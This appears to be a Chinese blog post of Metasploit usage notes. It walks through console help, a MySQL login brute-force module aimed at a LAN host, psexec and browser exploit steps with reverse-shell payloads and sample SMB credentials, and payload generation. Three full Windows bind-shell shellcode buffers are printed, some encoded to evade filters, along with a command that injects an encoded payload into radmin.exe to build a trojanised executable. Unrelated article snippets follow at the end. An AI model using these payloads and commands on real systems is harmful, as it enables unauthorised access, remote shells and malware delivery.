Usage: service < option > | --status-all | [ service_name [ command | --full-restart ] ]


msf6 > loot -h
Usage: loot [options]
 Info: loot [-h] [addr1 addr2 ...] [-t <type1,type2>]
  Add: loot -f [fname] -i [info] -a [addr1 addr2 ...] -t [type]
  Del: loot -d [addr1 addr2 ...]


OPTIONS:

    -a, --add                 Add loot to the list of addresses, instead of listing.
    -d, --delete              Delete *all* loot matching host and type.
    -f, --file <filename>     File with contents of the loot to add.
    -h, --help                Show this help information.
    -i, --info <info>         Info of the loot to add.
    -S, --search <filter>     Search string to filter by.
    -t, --type <type1,type2>  Search for a list of types.
    -u, --update              Update loot. Not officially supported.



msf6 > vulns -h
Print all vulnerabilities in the database

Usage: vulns [addr range]


OPTIONS:

    -d, --delete             Delete vulnerabilities. Not officially supported.
    -h, --help               Show this help information.
    -i, --info               Display vuln information.
    -o, --output <filename>  Send output to a file in csv format.
    -p, --port <port>        List vulns matching this port spec.
    -R, --rhosts             Set RHOSTS from the results of the search.
    -S, --search <filter>    Search string to filter by.
    -s, --service <name>     List vulns matching these service names.

Examples:
  vulns -p 1-65536          # only vulns with associated services
  vulns -p 1-65536 -s http  # identified as http on any port

  • set / unset / setg / unsetg / save

  • Run/ exploit

  • jobs / kill 0

  • load / unload /loadpath

  • Session

    • session -l/ -i( Shell 、Meterpreter session、VNC )
  • route 通过指定 session 路由流量

  • irb ( Framework::Version )

  • Resource ( msfconsol -r arc

msf6 > search mysql_login

Matching Modules
================

   #  Name                                 Disclosure Date  Rank    Check  Description
   -  ----                                 ---------------  ----    -----  -----------
   0  auxiliary/scanner/mysql/mysql_login                   normal  No     MySQL Login Utility


Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/mysql/mysql_login                                                             

msf6 > use auxiliary/scanner/mysql/mysql_login 
msf6 auxiliary(scanner/mysql/mysql_login) > 
msf6 auxiliary(scanner/mysql/mysql_login) > 
msf6 auxiliary(scanner/mysql/mysql_login) > show options

Module options (auxiliary/scanner/mysql/mysql_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   true             no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple store
                                                d in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current da
                                                tabase to the list
   DB_ALL_USERS      false            no        Add all users in the current databa
                                                se to the list
   DB_SKIP_EXISTING  none             no        Skip existing credentials stored in
                                                 the current database (Accepted: no
                                                ne, user, user&realm)
   PASSWORD                           no        A specific password to authenticate
                                                 with
   PASS_FILE                          no        File containing passwords, one per
                                                line
   Proxies                            no        A proxy chain of format type:host:p
                                                ort[,type:host:port][...]
   RHOSTS                             yes       The target host(s), see https://git
                                                hub.com/rapid7/metasploit-framework
                                                /wiki/Using-Metasploit
   RPORT             3306             yes       The target port (TCP)
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential wor
                                                ks for a host
   THREADS           1                yes       The number of concurrent threads (m
                                                ax one per host)
   USERNAME          root             no        A specific username to authenticate
                                                 as
   USERPASS_FILE                      no        File containing users and passwords
                                                 separated by space, one pair per l
                                                ine
   USER_AS_PASS      false            no        Try the username as the password fo
                                                r all users
   USER_FILE                          no        File containing usernames, one per
                                                line
   VERBOSE           true             yes       Whether to print output for all att
                                                empts


View the full module info with the info, or info -d command.


msf6 auxiliary(scanner/mysql/mysql_login) > set rhosts 192.168.1.121
rhosts => 192.168.1.121
msf6 auxiliary(scanner/mysql/mysql_login) > show options

Module options (auxiliary/scanner/mysql/mysql_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   true             no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple store
                                                d in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current da
                                                tabase to the list
   DB_ALL_USERS      false            no        Add all users in the current databa
                                                se to the list
   DB_SKIP_EXISTING  none             no        Skip existing credentials stored in
                                                 the current database (Accepted: no
                                                ne, user, user&realm)
   PASSWORD                           no        A specific password to authenticate
                                                 with
   PASS_FILE                          no        File containing passwords, one per
                                                line
   Proxies                            no        A proxy chain of format type:host:p
                                                ort[,type:host:port][...]
   RHOSTS            192.168.1.121    yes       The target host(s), see https://git
                                                hub.com/rapid7/metasploit-framework
                                                /wiki/Using-Metasploit
   RPORT             3306             yes       The target port (TCP)
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential wor
                                                ks for a host
   THREADS           1                yes       The number of concurrent threads (m
                                                ax one per host)
   USERNAME          root             no        A specific username to authenticate
                                                 as
   USERPASS_FILE                      no        File containing users and passwords
                                                 separated by space, one pair per l
                                                ine
   USER_AS_PASS      false            no        Try the username as the password fo
                                                r all users
   USER_FILE                          no        File containing usernames, one per
                                                line
   VERBOSE           true             yes       Whether to print output for all att
                                                empts


View the full module info with the info, or info -d command.


                                                                                                                    
msf6 > load -h
Usage: load <option> [var=val var=val ...]                                                                          
                                                                                                                    
Loads a plugin from the supplied path.                                                                              
For a list of built-in plugins, do: load -l                                                                         
For a list of loaded plugins, do: load -s                                                                           
The optional var=val options are custom parameters that can be passed to plugins.                                   
                                                                                                                    
msf6 > load openvas                                                                                                 
[*] Welcome to OpenVAS integration by kost and averagesecurityguy.                                                  
[*]                                                                                                                 
[*] OpenVAS integration requires a database connection. Once the                                                    
[*] database is ready, connect to the OpenVAS server using openvas_connect.                                         
[*] For additional commands use openvas_help.                                                                       
[*]                                                                                                                 
[*] Successfully loaded plugin: OpenVAS                                                                             
msf6 > openvas_help                                                                                                 
[*] openvas_help                  Display this help                                                                 
[*] openvas_debug                 Enable/Disable debugging                                                          
[*] openvas_version               Display the version of the OpenVAS server                                              
[*] 
[*] CONNECTION
[*] ==========
[*] openvas_connect               Connects to OpenVAS
[*] openvas_disconnect            Disconnects from OpenVAS
[*] 
[*] TARGETS
[*] =======
[*] openvas_target_create         Create target
[*] openvas_target_delete         Deletes target specified by ID
[*] openvas_target_list           Lists targets
[*] 
[*] TASKS
[*] =====
[*] openvas_task_create           Create task
[*] openvas_task_delete           Delete a task and all associated reports
[*] openvas_task_list             Lists tasks
[*] openvas_task_start            Starts task specified by ID
[*] openvas_task_stop             Stops task specified by ID
[*] openvas_task_pause            Pauses task specified by ID
[*] openvas_task_resume           Resumes task specified by ID
[*] openvas_task_resume_or_start  Resumes or starts task specified by ID
[*] 
[*] CONFIGS
[*] =======
[*] openvas_config_list           Lists scan configurations
[*] 
[*] FORMATS
[*] =======
[*] openvas_format_list           Lists available report formats
[*] 
[*] REPORTS
[*] =======
[*] openvas_report_list           Lists available reports
[*] openvas_report_delete         Delete a report specified by ID
[*] openvas_report_import         Imports an OpenVAS report specified by ID
[*] openvas_report_download       Downloads an OpenVAS report specified by ID


sf6 > route -h
Route traffic destined to a given subnet through a supplied session.

Usage:
  route [add/remove] subnet netmask [comm/sid]
  route [add/remove] cidr [comm/sid]
  route [get] <host or network>
  route [flush]
  route [print]

Subcommands:
  add - make a new route
  remove - delete a route; 'del' is an alias
  flush - remove all routes
  get - display the route for a given target
  print - show all active routes

Examples:
  Add a route for all hosts from 192.168.0.0 to 192.168.0.255 through session 1
    route add 192.168.0.0 255.255.255.0 1
    route add 192.168.0.0/24 1

  Delete the above route
    route remove 192.168.0.0/24 1
    route del 192.168.0.0 255.255.255.0 1

  Display the route that would be used for the given host or network
    route get 192.168.0.11


msf6 > irb
[*] Starting IRB shell...
[*] You are in the "framework" object

irb: warn: can't alias jobs from irb_jobs.
>> exit
msf6 > resource
Usage: resource path1 [path2 ...]
                                
Run the commands stored in the supplied files (- for stdin).
Resource files may also contain ERB or Ruby code between <ruby></ruby> tags.
                                
See also: makerc                
                                
msf6 >  

Exploit 模块

  • Active exploit (主动)

    • use exploit/windows/smb/psexec

    • set RHOST 192.168.1.100

    • set PAYLQAD windows/shell/reverse_tcp

    • set LHOST 192.168.1.1

    • set LPORT 4444

    • set SMBUSER user1

    • set SMBPASS pass1

    • exploit

  • Passive Exploits(被动)

    • use exploit/windows/browser/ms07_017_ani_loadimage_chunksize

    • set URIPATH /

    • set PAYLOAD windows/shell/reverse_tcp

    • set LHOST 192.168.1.1

    • set LPORT 4444

    • exploit

生成payload

  • use payload/windows/shell_bind_tcp

  • generate (坏字符)

  • msf自动选择编码模块绕过坏字符

    • generate -b x00!
    • generate -b ‘x00\x44\x67\x66\xfa\x01\xe\x44\x67\xa1\xa2\xa3\x75\x4b’
    • generate -b ‘x00\x44\x67\x66\xfa\x01\xe0\x44\x67\xa\xa2\xa3\x75\x4b\xFE\x0a\x0b\x01\xcc\x6e\x1e\x2e\x26’
  • 动指定编码模块

    • show encoders / generate -e x86/nonalpha
msf6 > use payload/windows/shell_bind_tcp
msf6 payload(windows/shell_bind_tcp) > show options

Module options (payload/windows/shell_bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST                      no        The target address


View the full module info with the info, or info -d command.


msf6 payload(windows/shell_bind_tcp) > generate
# windows/shell_bind_tcp - 328 bytes
# https://metasploit.com/
# VERBOSE=false, LPORT=4444, PrependMigrate=false, 
# EXITFUNC=process, CreateSession=true, AutoVerifySession=true
buf = 
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50" +
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" +
"\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7" +
"\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78" +
"\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3" +
"\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01" +
"\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58" +
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3" +
"\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a" +
"\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32" +
"\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff" +
"\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b" +
"\x00\xff\xd5\x6a\x08\x59\x50\xe2\xfd\x40\x50\x40\x50\x68" +
"\xea\x0f\xdf\xe0\xff\xd5\x97\x68\x02\x00\x11\x5c\x89\xe6" +
"\x6a\x10\x56\x57\x68\xc2\xdb\x37\x67\xff\xd5\x57\x68\xb7" +
"\xe9\x38\xff\xff\xd5\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57" +
"\x97\x68\x75\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89" +
"\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7" +
"\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50" +
"\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f" +
"\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d" +
"\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff" +
"\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72" +
"\x6f\x6a\x00\x53\xff\xd5"



msf6 payload(windows/shell_bind_tcp) > generate -b '\x00'
# windows/shell_bind_tcp - 355 bytes
# https://metasploit.com/
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, LPORT=4444, PrependMigrate=false, 
# EXITFUNC=process, CreateSession=true, AutoVerifySession=true
buf = 
"\xbb\x62\xd8\x91\xc1\xda\xd6\xd9\x74\x24\xf4\x5d\x29\xc9" +
"\xb1\x53\x83\xc5\x04\x31\x5d\x0e\x03\x3f\xd6\x73\x34\x43" +
"\x0e\xf1\xb7\xbb\xcf\x96\x3e\x5e\xfe\x96\x25\x2b\x51\x27" +
"\x2d\x79\x5e\xcc\x63\x69\xd5\xa0\xab\x9e\x5e\x0e\x8a\x91" +
"\x5f\x23\xee\xb0\xe3\x3e\x23\x12\xdd\xf0\x36\x53\x1a\xec" +
"\xbb\x01\xf3\x7a\x69\xb5\x70\x36\xb2\x3e\xca\xd6\xb2\xa3" +
"\x9b\xd9\x93\x72\x97\x83\x33\x75\x74\xb8\x7d\x6d\x99\x85" +
"\x34\x06\x69\x71\xc7\xce\xa3\x7a\x64\x2f\x0c\x89\x74\x68" +
"\xab\x72\x03\x80\xcf\x0f\x14\x57\xad\xcb\x91\x43\x15\x9f" +
"\x02\xaf\xa7\x4c\xd4\x24\xab\x39\x92\x62\xa8\xbc\x77\x19" +
"\xd4\x35\x76\xcd\x5c\x0d\x5d\xc9\x05\xd5\xfc\x48\xe0\xb8" +
"\x01\x8a\x4b\x64\xa4\xc1\x66\x71\xd5\x88\xee\xb6\xd4\x32" +
"\xef\xd0\x6f\x41\xdd\x7f\xc4\xcd\x6d\xf7\xc2\x0a\x91\x22" +
"\xb2\x84\x6c\xcd\xc3\x8d\xaa\x99\x93\xa5\x1b\xa2\x7f\x35" +
"\xa3\x77\x15\x3d\x02\x28\x08\xc0\xf4\x98\x8c\x6a\x9d\xf2" +
"\x02\x55\xbd\xfc\xc8\xfe\x56\x01\xf3\x11\xfb\x8c\x15\x7b" +
"\x13\xd9\x8e\x13\xd1\x3e\x07\x84\x2a\x15\x3f\x22\x62\x7f" +
"\xf8\x4d\x73\x55\xae\xd9\xf8\xba\x6a\xf8\xfe\x96\xda\x6d" +
"\x68\x6c\x8b\xdc\x08\x71\x86\xb6\xa9\xe0\x4d\x46\xa7\x18" +
"\xda\x11\xe0\xef\x13\xf7\x1c\x49\x8a\xe5\xdc\x0f\xf5\xad" +
"\x3a\xec\xf8\x2c\xce\x48\xdf\x3e\x16\x50\x5b\x6a\xc6\x07" +
"\x35\xc4\xa0\xf1\xf7\xbe\x7a\xad\x51\x56\xfa\x9d\x61\x20" +
"\x03\xc8\x17\xcc\xb2\xa5\x61\xf3\x7b\x22\x66\x8c\x61\xd2" +
"\x89\x47\x22\xe2\xc3\xc5\x03\x6b\x8a\x9c\x11\xf6\x2d\x4b" +
"\x55\x0f\xae\x79\x26\xf4\xae\x08\x23\xb0\x68\xe1\x59\xa9" +
"\x1c\x05\xcd\xca\x34"
msf6 payload(windows/shell_bind_tcp) > 


msf6 payload(windows/shell_bind_tcp) > generate -b 'x00x44\x67x66\xfalx01\xe0x44x67xa1\xa2xa3\x75\x4b'
# windows/shell_bind_tcp - 350 bytes
# https://metasploit.com/
# Encoder: x86/fnstenv_mov
# VERBOSE=false, LPORT=4444, PrependMigrate=false, 
# EXITFUNC=process, CreateSession=true, AutoVerifySession=true
buf = 
"\x6a\x52\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x0e" +
"\x5a\x89\xa1\x83\xeb\xfc\xe2\xf4\xf2\xb2\x0b\xa1\x0e\x5a" +
"\xe9\x28\xeb\x6b\x49\xc5\x85\x0a\xb9\x2a\x5c\x56\x02\xf3" +
"\x1a\xd1\xfb\x89\x01\xed\xc3\x87\x3f\xa5\x25\x9d\x6f\x26" +
"\x8b\x8d\x2e\x9b\x46\xac\x0f\x9d\x6b\x53\x5c\x0d\x02\xf3" +
"\x1e\xd1\xc3\x9d\x85\x16\x98\xd9\xed\x12\x88\x70\x5f\xd1" +
"\xd0\x81\x0f\x89\x02\xe8\x16\xb9\xb3\xe8\x85\x6e\x02\xa0" +
"\xd8\x6b\x76\x0d\xcf\x95\x84\xa0\xc9\x62\x69\xd4\xf8\x59" +
"\xf4\x59\x35\x27\xad\xd4\xea\x02\x02\xf9\x2a\x5b\x5a\xc7" +
"\x85\x56\xc2\x2a\x56\x46\x88\x72\x85\x5e\x02\xa0\xde\xd3" +
"\xcd\x85\x2a\x01\xd2\xc0\x57\x00\xd8\x5e\xee\x05\xd6\xfb" +
"\x85\x48\x62\x2c\x53\x32\xba\x93\x0e\x5a\xe1\xd6\x7d\x68" +
"\xd6\xf5\x66\x16\xfe\x87\x09\xa5\x5c\x19\x9e\x5b\x89\xa1" +
"\x27\x9e\xdd\xf1\x66\x73\x09\xca\x0e\xa5\x5c\xcb\x06\x03" +
"\xd9\x43\xf3\x1a\xd9\xe1\x5e\x32\x63\xae\xd1\xba\x76\x74" +
"\x99\x32\x8b\xa1\x1f\x06\x00\x47\x64\x4a\xdf\xf6\x66\x98" +
"\x52\x96\x69\xa5\x5c\xf6\x66\xed\x60\x99\xf1\xa5\x5c\xf6" +
"\x66\x2e\x65\x9a\xef\xa5\x5c\xf6\x99\x32\xfc\xcf\x43\x3b" +
"\x76\x74\x66\x39\xe4\xc5\x0e\xd3\x6a\xf6\x59\x0d\xb8\x57" +
"\x64\x48\xd0\xf7\xec\xa7\xef\x66\x4a\x7e\xb5\xa0\x0f\xd7" +
"\xcd\x85\x1e\x9c\x89\xe5\x5a\x0a\xdf\xf7\x58\x1c\xdf\xef" +
"\x58\x0c\xda\xf7\x66\x23\x45\x9e\x88\xa5\x5c\x28\xee\x14" +
"\xdf\xe7\xf1\x6a\xe1\xa9\x89\x47\xe9\x5e\xdb\xe1\x79\x14" +
"\xac\x0c\xe1\x07\x9b\xe7\x14\x5e\xdb\x66\x8f\xdd\x04\xda" +
"\x72\x41\x7b\x5f\x32\xe6\x1d\x28\xe6\xcb\x0e\x09\x76\x74"
msf6 payload(windows/shell_bind_tcp) > 

  • generate -b ‘x00’ -t exe -e x86/shikata_ga_nai -i 5 -k -x /usr/share/windows-binaries/radmin.exe -f/root/1.exe

  • NOP :no-operation/Next Operation(无任何操作)

    • EIP返回到存储NOP sled的任意地址时将递增,最终导致shellcode执行

    • generate -s 14

msf6 payload(windows/shell_bind_tcp) > generate -b 'x00' -t exe -e x86/shikata_ga_nai -i 5 -k -x /usr/share/windows-binaries/radmin.exe -f/root/1.exe
Usage: generate [options]

Generates a payload. Datastore options may be supplied after normal options.

Example: generate -f python LHOST=127.0.0.1

OPTIONS:

    -b   The list of characters to avoid example: '\x00\xff'
    -E   Force encoding
    -e   The encoder to use
    -f   Output format: base32,base64,bash,c,csharp,dw,dword,go,golang,hex,java,js_be,js_le,nim,nimlang,num,perl,pl,powershell,ps1,py,python,raw,rb,ruby,rust,rustlang,sh,vbapplication,vbscript,asp,aspx,aspx-exe,axis2,dll,elf,elf-so,exe,exe-only,exe-service,exe-small,hta-psh,jar,jsp,loop-vbs,macho,msi,msi-nouac,osx-app,psh,psh-cmd,psh-net,psh-reflection,python-reflection,vba,vba-exe,vba-psh,vbs,war
    -h   Show this message
    -i   The number of times to encode the payload
    -k   Preserve the template behavior and inject the payload as a new thread
    -n   Prepend a nopsled of [length] size on to the payload
    -o   The output file name (otherwise stdout)
    -O   Deprecated: alias for the '-o' option
    -p   The platform of the payload
    -P   Total desired payload size, auto-produce appropriate NOP sled length
    -S   The new section name to use when generating (large) Windows binaries
    -v   Verbose output (display stage in addition to stager)
    -x   Specify a custom executable file to use as a template

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1039688.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

若依切换数据源失败

1.遇到的问题 我们使用若依框架&#xff0c;首先这个框架完全开源&#xff0c;真的是很牛也很友好的框架。不像芋道各种关注各种收费&#xff0c;看个文档还要加入199的知识星球&#xff0c;真是恶心&#xff0c;个人觉得完全没必要&#xff0c;若依提供的扩展项目中都做了集成…

电商后台架构演变

单机架构 在网站最初时&#xff0c;应用数量与用户数都较少&#xff0c;可以把Tomcat和数据库部署在同一台服务器上。浏览器往www.taobao.com发起请求时&#xff0c;首先经过DNS服务器&#xff08;域名系统&#xff09;把域名转换为实际IP地址10.102.4.1&#xff0c;浏览器转而…

原生微信小程序开发-获取时区名称

参考以下文章&#xff1a;jstz - npmTimezone detection for JavaScript. Latest version: 2.1.1, last published: 5 years ago. Start using jstz in your project by running npm i jstz. There are 55 other projects in the npm registry using jstz.https://www.npmjs.co…

MOTOROLA MVME5500 数字量控制模块

Motorola MVME5500 是一款嵌入式计算平台&#xff0c;不是数字量控制模块&#xff0c;而是用于嵌入式计算和控制的计算机硬件。通常情况下&#xff0c;它被用于工业自动化、控制系统、数据采集以及嵌入式应用中。以下是 Motorola MVME5500 的一般功能和特点&#xff1a; 计算性…

2023年下半年软考高级系统架构设计师论文指南(收藏)

由于今年下半年软考改为了机考&#xff0c;所以今年是看大家码字的速度了&#xff0c;但是好处还是有的&#xff0c;错了还能删除&#xff0c;之前纸质的 还有点不方便。 1、选择题目 &#xff08;1&#xff09;控制选题的时间。不要浪费太多时间在纠结选题上面。 &#xff…

9.为算法中的特定行添加注释

在 algorithm2e 宏包中&#xff0c;您可以使用 \tcp{} 命令来为算法中的特定行添加注释。这个命令会在算法伪代码中的某一行的末尾添加注释文本。 以下是一个\tcp 示例&#xff0c;演示如何在算法中添加注释&#xff1a; \documentclass{article} \usepackage[linesnumbered,…

MySQL-树型结构数据查询

表结构 进行树形结构查询&#xff0c;利用特殊语法进行操作 with recursive t as(select parent_id , business_namefrom business_line where id 21union allselect a.parent_id, a.business_namefrom business_line a join t on a.id t.parent_id) select business_name f…

四川天蝶电子商务有限公司可靠吗?真实吗?

​近年来&#xff0c;抖音带货已成为一种日益流行的新零售趋势。而四川天蝶电子商务有限公司作为抖音带货领域的先行者之一&#xff0c;备受消费者关注。但是&#xff0c;我们不能仅凭其名声来评判其可靠性。在对该公司的抖音带货服务进行评估之前&#xff0c;有必要了解和了解…

代码随想录 Day5 哈希表1 T242 相同字母的异序词 T349两个数组的交集 T202 快乐数 T1 两数之和

本文详细解答和思路来自于: 代码随想录 (programmercarl.com) 前导知识 - 哈希表 定义:哈希表是根据关键码的值而直接进行访问的数据结构.所谓的关键码就是下标实际上数组就是一张哈希表. 那么哈希表有什么作用呢?哈希表可以以O(1)的性能迅速定位你要找的元素,相较于依次遍…

代码随想录第34天 | 343. 整数拆分 96.不同的二叉搜索树

343. 整数拆分 /*** param {number} n* return {number}*/ var integerBreak function(n) {let dpnew Array(n1)dp.fill(1)for(let i3;i<n;i)for(let j1;j<i/2;j){dp[i] max(dp[i],max(j*(i-j),dp[i-j]*j))} function max(a,b){return a>b?a:b }return dp[n] }; 想…

四、初识FreeRTOS之FreeRTOS移植

一、获取FreeRTOS&#xff08;熟悉&#xff09; 1.1 源码获取&#xff1a; FreeRTOS官网&#xff1a;https://www.freertos.org/,本人所使用的例程为FreeRTOS的V10.4.6版本。 进入后点击下载FreeRTOS&#xff0c;选择“FreeRTOS 202112.00”文件&#xff0c;下载完成后解压到…

企业资源计划即 ERP (Enterprise Resource Planning)

ERP是一种主要面向制造行业进行物质资源、资金资源和信息资源集成一体化管理的企业信息管理系统。ERP是一个以管理会计为核心可以提供跨地区、跨部门、甚至跨公司整合实时信息的企业管理软件。针对物资资源管理&#xff08;物流&#xff09;、人力资源管理&#xff08;人流&…

(09_22)【有奖体验】轻点鼠标,让古籍数字化“重生_

卷帙浩繁的古籍是古典文化的载体&#xff0c;珍贵的古籍往往很难轻易示人&#xff0c;数字化是解决古籍‘藏’与‘用’之间矛盾的最好方式&#xff0c;函数计算联合开发者宋杰开发“古籍识别“应用&#xff0c;希望更多开发者行动起来&#xff0c;用Serverless AI 让古籍“活”…

upload-labs靶场未知后缀名解析漏洞

upload-labs靶场未知后缀名解析漏洞 版本影响&#xff1a; phpstudy 版本&#xff1a;5.2.17 ​ 1 环境搭建 1.1 在线靶场下载&#xff0c;解压到phpstudy的www目录下&#xff0c;即可使用 https://github.com/c0ny1/upload-labs1.2 已启动&#xff1a;访问端口9000&…

阿里云Stable Diffusion操作教程

大家好,我是雄雄,欢迎关注微信公众号:雄雄的小课堂 前言 Stable Diffusion是⼀种深度学习模型,主要⽤于将⽂本描述转化为详细的图像,也可以应⽤于其他图像处理任务 。 这个模型由创业公司Stability AI 与学术研究者合作开发,使⽤了⼀种称为潜在扩散模型(LDM)的扩散模型…

测试15k薪资第1步 —— 自动化测试理论基础

目录 1、自动化测试定义 2、自动化测试分类&工具 3、未来发展趋势 1.1、什么是自动化测试 自动化测试指的是利用软件工具或脚本来执行测试任务&#xff0c;以替代手动测试过程的一种测试方法。它的主要目的是通过自动化执行、验证和评估软件应用的功能、稳定性、性能等方面…

SpringBoot 学习(九)Redis

11. 集成 Redis 11.1 说明 SpringBoot 操作数据&#xff1a;sping-data、jpa、jdbc、mongodb、redis SpringBoot 2. 后&#xff0c;jedis 被替换为 lettuce jedis&#xff1a;采用直连&#xff0c;多线程操作不安全&#xff0c;增强安全性需使用 jedis pool 连接池&#xff0…

hanoi塔问题

汉诺塔 5层攻略31步_哔哩哔哩_bilibili 问题描述&#xff1a; n阶Hanoi塔问题&#xff0c;假设有3个分别命名为A、B、C塔座&#xff0c;在塔座A上插有n个直径大小各不相同、依小到大的圆盘。现要求将A轴上的n个圆盘移动至塔座C上并按同样顺序叠排&#xff0c;圆盘移动时必须遵…

《计算机网络》——应用层

2.1 应用层协议原理&#xff08;P54&#xff09; 研发网络应用的核心是写出能够运行在不同端系统和通过网络彼此交流的程序。 2.1.1 网络应用程序体系结构 两种主流的应用体系结构&#xff1a;客户-服务器体系结构、对等体系结构。 客户-服务器体系&#xff1a;服务器是一个…

PICO首届XR开发者挑战赛正式启动,助推行业迈入“VR+MR”新阶段

9月25日&#xff0c;“PICO 2023首届XR开发者挑战赛”&#xff08;下文简称“挑战赛”&#xff09;媒体启动会在北京圆满落幕&#xff0c;官方赛事报名通道已于今日开启。据悉&#xff0c;本次挑战赛是PICO首次针对全球开发者举办的大型挑战赛事&#xff0c;旨在与开发者保持连…